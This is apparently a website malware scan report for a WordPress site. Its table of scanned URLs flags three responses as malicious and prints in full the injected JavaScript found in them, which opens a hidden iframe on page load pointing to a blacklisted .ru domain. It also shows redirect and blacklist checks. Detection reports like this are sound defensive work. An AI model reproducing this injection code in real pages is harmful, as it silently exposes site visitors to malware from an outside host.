Scanned pages/files
Request | Server response | Status |
http://danradcliffe.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 30 Sep 2014 22:18:34 GMT Via: 1.1 varnish Age: 0 Location: http://www.danradcliffe.com/ Server: nginx/1.4.4 Content-Type: text/html; charset=UTF-8 Magicmarker: 1 X-Cacheable: YES X-Pingback: http://www.danradcliffe.com/xmlrpc.php X-Varnish: 157683282 157683281 | clean |
http://www.danradcliffe.com/ | 200 OK Content-Length: 81014 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: rabiorik.ru function create_frame(a){var b=document.getElementById('oq3tq');if(typeof(b)!='undefined'&&b!=null){}else{var c=document.createElement('iframe');c.id="oq3tq";c.style.width="0px";c.style.height="0px";c.style.border="0px";c.frameBorder="0";c.style.display="none";c.setAttribute("frameBorder","0");document.body.appendChild(c);c.src=a;return true}}function wlzibl5(){create_frame("http://rabiorik.ru/szvhwzo.cgi?default")}try{if(window.attachEvent){window.attachEvent('onload',wlzibl5)}else{if(window.onload){var curronload=window.onload;var newonload=function(){curronload();wlzibl5()};window.onload=newonload}else{window.onload=wlzibl5}}}catch(err){} Decoded script: function wlzibl5() { create_frame("http://rabiorik.ru/szvhwzo.cgi?default"); } | ||
http://www.danradcliffe.com/wp-includes/js/jquery/jquery.js?ver=1.11.1 | 200 OK Content-Length: 95807 Content-Type: application/x-javascript | clean |
http://www.danradcliffe.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/x-javascript | clean |
http://www.danradcliffe.com/wp-includes/js/jquery/jquery.color.min.js?ver=2.1.1 | 200 OK Content-Length: 9295 Content-Type: application/x-javascript | clean |
http://www.danradcliffe.com/wp-content/plugins/ultimate-social-deux/public/assets/js/script-ck.js?ver=3.1.5 | 200 OK Content-Length: 49021 Content-Type: application/x-javascript | clean |
http://www.danradcliffe.com/wp-content/themes/Implicit-Theme/implicit/js/ajax.min.js?ver=4.0 | 200 OK Content-Length: 23705 Content-Type: application/x-javascript | clean |
http://danradcliffe.com//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Tue, 30 Sep 2014 22:18:41 GMT Pragma: no-cache Via: 1.1 varnish Age: 0 Location: http://www.danradcliffe.com/pagead2.googlesyndication.com/pagead/js/adsbygoogle.js/ Server: nginx/1.4.4 Content-Type: text/html; charset=UTF-8 Magicmarker: 1 X-Cacheable: YES X-Pingback: http://www.danradcliffe.com/xmlrpc.php X-Varnish: 157683295 | clean |
http://www.danradcliffe.com/pagead2.googlesyndication.com/pagead/js/adsbygoogle.js/ | 404 Not Found Content-Length: 843 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: rabiorik.ru function create_frame(a){var b=document.getElementById('4ey62');if(typeof(b)!='undefined'&&b!=null){}else{var c=document.createElement('iframe');c.id="4ey62";c.style.width="0px";c.style.height="0px";c.style.border="0px";c.frameBorder="0";c.style.display="none";c.setAttribute("frameBorder","0");document.body.appendChild(c);c.src=a;return true}}function xs2o4mj(){create_frame("http://rabiorik.ru/bkygimc.cgi?default")}try{if(window.attachEvent){window.attachEvent('onload',xs2o4mj)}else{if(window.onload){var curronload=window.onload;var newonload=function(){curronload();xs2o4mj()};window.onload=newonload}else{window.onload=xs2o4mj}}}catch(err){} Decoded script: function xs2o4mj() { create_frame("http://rabiorik.ru/bkygimc.cgi?default"); } | ||
http://www.danradcliffe.com/test404page.js | 404 Not Found Content-Length: 843 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: rabiorik.ru function create_frame(a){var b=document.getElementById('r2qpr');if(typeof(b)!='undefined'&&b!=null){}else{var c=document.createElement('iframe');c.id="r2qpr";c.style.width="0px";c.style.height="0px";c.style.border="0px";c.frameBorder="0";c.style.display="none";c.setAttribute("frameBorder","0");document.body.appendChild(c);c.src=a;return true}}function a5tjlqa(){create_frame("http://rabiorik.ru/jorczaj.cgi?default")}try{if(window.attachEvent){window.attachEvent('onload',a5tjlqa)}else{if(window.onload){var curronload=window.onload;var newonload=function(){curronload();a5tjlqa()};window.onload=newonload}else{window.onload=a5tjlqa}}}catch(err){} Decoded script: function a5tjlqa() { create_frame("http://rabiorik.ru/jorczaj.cgi?default"); } | ||
http://www.danradcliffe.com/wp-includes/js/jquery/ui/jquery.ui.core.min.js?ver=1.10.4 | 200 OK Content-Length: 4289 Content-Type: application/x-javascript | clean |
http://www.danradcliffe.com/wp-includes/js/jquery/ui/jquery.ui.widget.min.js?ver=1.10.4 | 200 OK Content-Length: 6521 Content-Type: application/x-javascript | clean |
http://www.danradcliffe.com/wp-includes/js/jquery/ui/jquery.ui.tabs.min.js?ver=1.10.4 | 200 OK Content-Length: 11623 Content-Type: application/x-javascript | clean |
http://www.danradcliffe.com/wp-includes/js/jquery/ui/jquery.ui.mouse.min.js?ver=1.10.4 | 200 OK Content-Length: 2841 Content-Type: application/x-javascript | clean |
http://www.danradcliffe.com/wp-includes/js/jquery/ui/jquery.ui.slider.min.js?ver=1.10.4 | 200 OK Content-Length: 10244 Content-Type: application/x-javascript | clean |
http://www.danradcliffe.com/wp-includes/js/jquery/ui/jquery.ui.effect.min.js?ver=1.10.4 | 200 OK Content-Length: 12972 Content-Type: application/x-javascript | clean |
http://www.danradcliffe.com/wp-includes/js/jquery/ui/jquery.ui.effect-slide.min.js?ver=1.10.4 | 200 OK Content-Length: 774 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: danradcliffe.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 30 Sep 2014 22:18:34 GMT
Via: 1.1 varnish
Age: 0
Location: http://www.danradcliffe.com/
Server: nginx/1.4.4
Content-Type: text/html; charset=UTF-8
Magicmarker: 1
X-Cacheable: YES
X-Pingback: http://www.danradcliffe.com/xmlrpc.php
X-Varnish: 157683282 157683281
GET / HTTP/1.1
Host: danradcliffe.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 30 Sep 2014 22:18:34 GMT
Via: 1.1 varnish
Age: 0
Location: http://www.danradcliffe.com/
Server: nginx/1.4.4
Content-Type: text/html; charset=UTF-8
Magicmarker: 1
X-Cacheable: YES
X-Pingback: http://www.danradcliffe.com/xmlrpc.php
X-Varnish: 157683282 157683281
Second query (visit from search engine):
GET / HTTP/1.1
Host: danradcliffe.com
Referer: http://www.google.com/search?q=danradcliffe.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: danradcliffe.com
Referer: http://www.google.com/search?q=danradcliffe.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=danradcliffe.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://danradcliffe.com/
Result: danradcliffe.com is not infected or malware details are not published yet.
Result: danradcliffe.com is not infected or malware details are not published yet.